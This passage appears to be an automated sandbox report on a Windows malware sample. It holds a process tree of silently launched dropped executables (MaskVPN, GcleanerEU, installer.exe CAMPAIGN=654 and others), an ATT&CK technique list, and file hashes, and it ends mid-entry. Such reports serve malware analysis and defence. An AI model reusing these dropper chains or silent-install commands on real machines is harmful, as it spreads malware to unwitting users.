                                                                                                                                                      tapinstall.exe remove tap0901
                                                                                                                                                      5⤵
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      PID:8740
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                    4⤵
                                                                                                                                                      PID:7300
                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                        5⤵
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                        PID:1852
                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                      4⤵
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:6232
                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                      4⤵
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:2272
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-4VGDN.tmp\MediaBurner2.tmp
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-4VGDN.tmp\MediaBurner2.tmp" /SL5="$103CE,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:5220
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-5U1MA.tmp\3377047_logo_media.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-5U1MA.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                                                  2⤵
                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  PID:4916
                                                                                                                                                  • C:\Program Files\Common Files\JTVGBKYOUE\ultramediaburner.exe
                                                                                                                                                    "C:\Program Files\Common Files\JTVGBKYOUE\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5788
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-USIHM.tmp\ultramediaburner.tmp
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-USIHM.tmp\ultramediaburner.tmp" /SL5="$10586,281924,62464,C:\Program Files\Common Files\JTVGBKYOUE\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                        4⤵
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                        PID:5128
                                                                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5360
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\48-52397-58a-b5e94-40aa7729c4be3\Focamybuda.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\48-52397-58a-b5e94-40aa7729c4be3\Focamybuda.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        PID:5168
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\b1-9930e-2c0-6f688-1dbe52a839cb2\Wulavatobae.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\b1-9930e-2c0-6f688-1dbe52a839cb2\Wulavatobae.exe"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:6428
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fwf0nui0.srb\GcleanerEU.exe /eufive & exit
                                                                                                                                                            4⤵
                                                                                                                                                              PID:7816
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:6516
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\fwf0nui0.srb\GcleanerEU.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\fwf0nui0.srb\GcleanerEU.exe /eufive
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:6900
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pweui00s.qnb\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:8268
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\pweui00s.qnb\installer.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\pweui00s.qnb\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:8820
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tbovwnap.ws3\ufgaa.exe & exit
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:8668
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1xkjx2bb.tyw\anyname.exe & exit
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:8196
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1xkjx2bb.tyw\anyname.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1xkjx2bb.tyw\anyname.exe
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:7356
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1xkjx2bb.tyw\anyname.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1xkjx2bb.tyw\anyname.exe" -q
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:9120
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lb4g3uve.p31\gcleaner.exe /mixfive & exit
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:7280
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lb4g3uve.p31\gcleaner.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\lb4g3uve.p31\gcleaner.exe /mixfive
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:8600
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\addb0x0g.xbz\autosubplayer.exe /S & exit
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:6552
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2osyqfdr.1vt\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:7492
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2osyqfdr.1vt\installer.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\2osyqfdr.1vt\installer.exe /qn CAMPAIGN=654
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:5372
                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                PID:6620
                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding AAD879355B0ADFCE417869A5D5E40C27 C
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:7800
                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 7C4BE4A388DF39DD3085898143DF3A67 C
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:7736
                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding F6A7D5F4AA7CAFAFC9C4381689EF8AAA C
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:8896
                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 50AC0891D08254036ACAA409655FDC06
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:8996
                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                PID:1948
                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                PID:8396
                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                PID:5700
                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{350cc12c-03d8-0642-a4ba-445e686c7d6a}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2272
                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                    DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000158"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    PID:2836
                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  PID:6068
                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  PID:5412
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:1080
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4560
                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5784
                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                        MaskVPNUpdate.exe /silent
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:2464
                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:5968
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:6176
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:3036
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:8364
                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:8708
                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5616
                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:1524
                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:8532
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:4012
                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:7948
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:7108
                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:8904
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5892
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:3148
                                                                                                                                                                                                                • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                  C:\Windows\system32\AUDIODG.EXE 0x3d4
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:7332
                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:8196
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:5836
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:7100
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:6944
                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:7128
                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:200
                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:1208
                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:6148
                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:7580

                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1089

                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1130

                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1518

                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                    7
                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                    7
                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1018

                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                      SHA512

